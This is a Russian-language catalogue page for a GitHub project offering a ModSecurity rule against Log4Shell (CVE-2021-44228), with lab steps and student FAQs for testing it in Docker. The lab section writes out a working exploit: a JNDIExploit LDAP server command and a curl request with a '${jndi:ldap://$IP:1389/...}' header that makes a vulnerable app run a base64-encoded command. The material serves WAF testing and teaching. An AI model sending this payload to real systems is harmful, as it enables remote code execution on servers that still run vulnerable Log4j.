Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ModSec-log4j2 — Правило ModSec для защиты log4j2 - CVE-2021-44228 | Kitploit
Инструменты/GitHubGitHub/felipe8398/modsec-log4j2
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеОбучение и Образование
GitHubfelipe8398/modsec-log4j2

ModSec-log4j2

Правило ModSec для защиты log4j2 - CVE-2021-44228

Репозиторий
34 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Тестирование правила ModSec

Предварительные требования

  • Установленный Docker
  • Установленная Java на вашей машине

Выполнение теста

  • Выполнить git clone репозитория
  • Выполнить следующую команду для запуска WAF (ModSec) и уязвимого приложения
root@kitploit:~
docker stack deploy -c docker-compose.yml WAF
  • Извлечь JNDIExploit.v1.2.zip, находящийся в репозитории, перейти в папку и выполнить следующую команду, где $IP должен быть IP вашей машины, не рекомендую использовать 127.0.0.1
root@kitploit:~
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
  • Для проверки RCE выполните curl ниже, заменив $IP на IP вашей машины. Он создаст файл pwned в /tmp уязвимого приложения
root@kitploit:~
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Вопросы студентов

1- Как узнать, что мой WAF и уязвимое веб-приложение запущены?

Выполните docker service ls и проверьте, есть ли два сервиса, каждый с одной репликой.

2- Как получить лог ModSecurity?

Выполните docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log

3- Как проверить, что RCE не сработал?

Использованный curl создает файл с именем pwned в /tmp, поэтому нам нужно выполнить docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp

Скачать инструмент